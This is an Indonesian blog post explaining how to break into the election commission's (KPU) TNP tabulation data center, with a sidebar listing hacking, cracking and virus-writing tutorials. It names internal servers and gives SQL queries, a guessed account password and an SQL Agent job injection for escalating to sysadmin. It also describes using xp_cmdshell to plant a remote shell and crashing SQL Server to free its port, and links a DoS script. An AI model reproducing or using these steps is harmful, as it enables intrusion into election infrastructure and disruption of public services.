TUTORIAL KOMPUTER
  • 10 Virus Komputer Paling Mematikan Di Dunia
  • Kunci Mempercepat Acces Komputer
  • MENGENAL SISTEM KOMPUTER
  • Sejarah Perkembangan Komputer
  • Informasi computer terkini
  • Mengenal System Software
  • Mengupas Masalah Motherboard
  • Mengupas Detail Tentang CPU
  • Kode Mempercepat Editing Paragraf
  • Memproteksi Folder Dengan Password
  • Macam-Macam Perintah Pada Run Commands
  • Mempercepat Waktu Shutdown
  • Ubah Tampilan Windows
  • Kode Akses Siemens
  • Kode Akses Samsung
  • Kode Akses Sony Ericsson
  • Kode Akses Nokia
  • Seni Photoshop ( Angan Merokok )
  • Menyembunyikan Menu Help Pada Start Menu
  • Menyembunyikan Menu Document Pada Start Menu
  • Menyembunyikan menu Find pada Start Menu
  • Mengembalikan Folder Documents Yang Hilang
  • Memproteksi File
  • Mengganti Icon Drive
  • Mengganti Alignment Pada Drop Down Menu
  • Disable Klik Kanan Pada Taskbar
  • Disable Klik Kanan Pada Dekstop & Explorer
  • Menyembunyikan Menu Start Menu
  • Persentasi Antara Flash Dan Power Point
  • Mengganti Screen Saver Lewat Registry
  • Menghilangkan Username Pada Start Menu
  • Menampilkan Administrator Di Welcome Screen
  • Menyembunyikan My Recent Documents
  • TUTORIAL HACKER
  • Bad Unicode
  • Cara Skip Win Registrasi XP
  • Craking Dengan F.A.R.A.B.I
  • DoS, Serangan yang Belum Tertangkal
  • Hack Dan Prinsip Dasar Psikologis Hack
  • Hacking NT Server Melalui Remote Data Service
  • 95% Web Server Di Dunia has been dead
  • Hacking Web Site with cart32.exe installed
  • Konsep Lain Menjebol Server Webfroot Shutbox
  • Istilah Teknologi Informasi Bahasa Indonesia
  • Mendapatkan account ISP gratis!
  • Mendapatkan Serial Number WinZip 8.1
  • Menghilangkan Password Bios
  • Mengintip Password Linux
  • Menjebol Apache Web Server Melalui Test-Cgi
  • Menjebol Server Melalui Service FTP
  • Pembobolan 1000 Kredit Card di Step-up
  • Penjebolan Server Melalui FTP
  • Hati-hati DLM Mengetikkan Klikbca.Com
  • VIRUS M HEART
  • Bongkar Password Microsoft Acces
  • BUG TELKOMSEL & (FREE Phone ke-CYPRUS
  • Cara Efisien Mendapatkan Puluhan Ribu Email
  • Cara Sederhana membuat virus PHP
  • Cara Singkat Menginfeksi Openssh-3.4p1 Z
  • Cracking GateKeeperm
  • HACKING FOR BEGINNER
  • Hack Windows NT2000XP Admin Password
  • Melewati pembatasan hak akses warnet
  • Melindungi Data dari SQL Injection
  • memainkan fungsi tombol HP
  • Membedah Teknik SQL Injection
  • Bongkar key Windows Dengan @ stake LC4
  • Meminimalkan Biaya Saat menelpon Di Wartel
  • Menangani Virus Lohan
  • MENGACAK-ACAK REGISTRY WARNET
  • Mengelabui Pengejar Hacker
  • Meng-Hack Pesawat Telepon Yang Terkunci
  • Meng-hack PHP-BUg's
  • Kelemahan pasword & login yahoo pd Cgi
  • Trik Penjebolan Sites
  • Ragam Hacking Menggunakan Google
  • Rahasia Teknik Serangan SQL Injenction
  • Teknik Pembuatan Virus Makro Pd XP
  • Seni Internet, Googlingg
  • Situs Hacker Yang Ikut Bermasalah
  • Teknik Hacking Situs KPU Dr segla arah
  • Teknik Menyusup Ke TNP Center KPU
  • Tip N Trik Telephon Gratis Musso
  • Trik Mereset Password Windows 9x
  • TUTORIAL BLOG
  • Menuliskan Script di Blog
  • Membuat Artikel Terkait/Berhubungan
  • Membuat Feed di Blog Dengan Javascript
  • Membuat Navigasi Breadcrumb di Blog
  • Membuat Meta Deskripsi di Halaman Blog
  • Membuat Readmore Versi 1
  • Membuat Read More Otomatis di Blog
  • Membuat Read More Versi 2
  • Membuat Tabs Menu Horizontal
  • Membuat Menu Tab View
  • Membuat Menu Vertikal
  • Cara Memasang Musik Pada Blog
  • Membuat Template Blog Hasil Buatan Sendiri
  • Buat Threaded Comment dgn Intense Debate
  • Membuat Menu DTree
  • Membuat Tab Menu Dengan Banyak Style
  • Menambah Toolbar Baru di Blogspot
  • Cara Membuat Tabel di Blog
  • Cara Membuat Tulisan Berjalan
  • Melakukan Backup Website atau Blog
  • Mendapatkan Free Hosting
  • Membuat Widget Status Twitter pada Blog
  • Manampilkan Profil Facebook di Website (blog)
  • Membuat Avatar Komentar Pada Blogger
  • Membuat Halaman Contact Me pada Blogspot
  • Cara Membuat Status Yahoo Messenger di Blog
  • Mendapatkan Layanan Google Friend Connect
  • Membuat Nomor Page Posting Di Blog
  • Tips dan Trik Menambah Kolom Di Blog
  • Mengatasi "Invalid Widget ID" pada Blogger
  • Membuat Slide Show Album Foto di Blog
  • Membuat Kotak Komentar dibawah Posting
  • Cara Membuat Kotak Link Exchange
  • Membuat Link Download
  • Cara Membuat Dropdown Menu
  • Cara Membuat Buku Tamu
  • Trik Memproteksi Blog
  • Cara Membuat Search Engine
  • Membuat Kategori / Label di Blogger
  • Menghilangkan Navbar (Navigation Bar)
  • Memasang Emoticon di Kotak Komentar
  • Menambah Emoticon di Shoutbox
  • Pasang Jam di Sidebar
  • Memasang Pelacak IP Address
  • Mengganti Tulisan "Older Post / Newer Post"
  • Memasang Alexa Traffic Rank
  • Memasang Tombol Google Buzz
  • Cara Membuat Cursor Animasi
  • Menyembuyikan Buku Tamu
  • 5 Cara Terbaik Mendapatkan Uang Dari Blog
  • Blogging Cepat Dengan BlogThis!
  • 21 Posts Separator Images
  • Mengganti Link Read More Dgn Gambar
  • Cara Menampilkan 10 Artikel Di Recent Posts
  • Offline Blogging Dgn Windows Live Writer
  • Cara Memasang Jadwal Sholat
  • Cara Membuat Daftar Isi Blog Otomatis
  • Membuat Daftar Isi Blog Manual
  • Iklan Google Adsense Di Tengah Artikel
  • Membuat Link Warna - Warni
  • Meletakkan Widget Di Bawah Header
  • Membuat Kotak Scrollbar
  • Memasang Video Di Artikel
  • Kode Warna HTML
  • Home » » Teknik Menyusup Ke TNP Center KPU

    Teknik Menyusup Ke TNP Center KPU

    Server data center TNP KPU yang bernama SITUNGSRV  dilindungi dengan sangat ketat oleh firewall, diawasi olehcatatan log, dan dimonitor oleh detektor penyusup (IDS).Lantas bagaimana cara menyusupnya?

    Di sini saya akan mengemukakan salah satu cara untuk menyusup ke data center TNP KPU. Sebelumnya saya akan sedikit menjelaskan mengenai web server,SQL server, dan data center TNP KPU. Pada saat kita membuka situsweb http://tnp.kpu.go.id/Tabulasi/ maka kita akanterkoneksi ke server bernama KPUDCRPT02 yang menjadi IIS web servernya. Kemudian KPUDCRPT02 mengambil data dari KPUDCSQL02 yang menjadi SQL servernya. Database di KPUDCSQL02 ini diupdate secara rutin dari data center SITUNGSRV. Dengan menggunakan perintah SQL (pada tools yang telah diberikan sebelumnya) kita sudah dapat mengakses database di SITUNGSRV. Misalnya:  Untuk melihat list table: SELECT [name] FROM situngsrv.situng.dbo.sysobjects WHERE  [type]='U' or [type]='S'

    Untuk melihat list user:
    SELECT [name], [hasdbaccess], [islogin], [isntname],
    [isntgroup], [isntuser], [issqluser], issqlrole FROM
    situngsrv.situng.dbo.sysusers

    Namun cara ini sangat terbatas, karena kita masuk dengan  menggunakan login guest. Kita perlu login lain yang lebih  powerfull. Di sini kita dapat memanfaatkan kelemahan password reportmaker01 yang dengan mudah bisa kita tebak. Misalnya kita telah menemukan password reportmaker01 sebagai reportmaker. Kita dapat mencobanya memasukkan perintah berikut:

    SELECT uid FROM
    OPENROWSET('SQLOLEDB','SITUNGSRV';'reportmaker01';'reportmaker','SELECT
    user_name() as uid')

    Sekarang kita perlu menaikkan privilege-nya menjadi admin dengan memberikan SQL Injection yang memanfaatkan SQL Agent sebagai eksekutornya. Penggunaannya adalah sebagai berikut: SELECT uid FROMOPENROWSET('SQLOLEDB','SITUNGSRV';'reportmaker01';'reportmaker','SELECT user_name() as uid'; Sisipan SQL Injection)

    Sisipan SQL Injection yang kita berikan dapat berupa:
    USE msdb; EXEC sp_add_job
    @job_name='HealthCU',@enabled=1,@description='Weekly maintenance',@delete_level=1)USE msdb; EXEC sp_add_jobstep
    @job_name='HealthCU',@step_name='Tahap01',@subsystem='TSQL',@command='execmaster..xp_execresultset N''select ''''EXECsp_addrolemember
    ''''''''db_accessadmin'''''''',''''''''reportmaker01'''''''''''''',N''situng''';)USE msdb; EXEC sp_add_jobserver
    @job_name='HealthCU',@server_name='SITUNGSRV')
    USE msdb; EXEC sp_start_job @job_name='HealthCU')


    Maka login reportmaker01 sudah memiliki privilege db_accessadmin. Cara yang sama dapat juga digunakan untuk menaikkan priviledge menjadi sysadmin sehingga kita dapat mengeksekusi xp_cmdshell.Dengan xp_cmdshell kita bisa membuat sebuah file executable sebagai remote-shell yang dapat membuat SITUNGSRV berkomunikasi dengan KPUDCSQL02. 

    Bagaimana cara berkomunikasinya? Bukankah semua port sudah ditutup oleh firewall?
    Port 1143 tidak diblok. Namun port ini sudah digunakan oleh SQL Server dan kita tidak dapat menggunakannya lagi. Kita perlu membuat SQL server di SITUNGSRV untuk mati sejenak sehingga kita bisa menggunakan portnya. Caranya adalah dengan mengeset automatically start menjadi manually start, dan
    membuat SQL servernya crash.

    Cara untuk membuat SQL server menjadi manually start dan crash silakan lihat script pada
    http://tnpkpu.europe.webmatrixhosting.net/tnpdos.htm
    Pada saat server ini crash, maka operator akan menelpon administrator. Kemudian administrator akan menginstruksikan operator untuk me-restart server. Namun SQL server tidak akan otomatis jalan, tetapi remote-shell kita yang akan tereksekusi. 

    Selama menunggu administrator datang ke lokasi untuk men-start SQL server, kita dapat menikmati akses remote-shell pada SITUNGSRV, data center TNP KPU.Saat ini seluruh server yang terkoneksi ke jaringan sudah dimatikan termasuk SITUNGSRV, KPUDCSQLxx, KPUDCRPTxx dan digantikan oleh server bernama TNP. Dimohon untuk tidak mengklik button Kirim DoS pada http://tnpkpu.europe.webmatrixhosting.net/tnpdos.htm karena
    akan membuat SQL server di server TNP crash dan manually start sehingga artikel yang sebelumnya menjadi tidak dapat dicobakan.

    Berikan Pendapat Anda Untuk Artikel Ini
    Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Creating Website

    0 komentar:

    Poskan Komentar

     
    Support : Creating Website | Tutorq Template | Template
    Copyright © 2011. FAROUQ'S - All Rights Reserved
    Template Modify by Creating Website
    Proudly powered by Blogger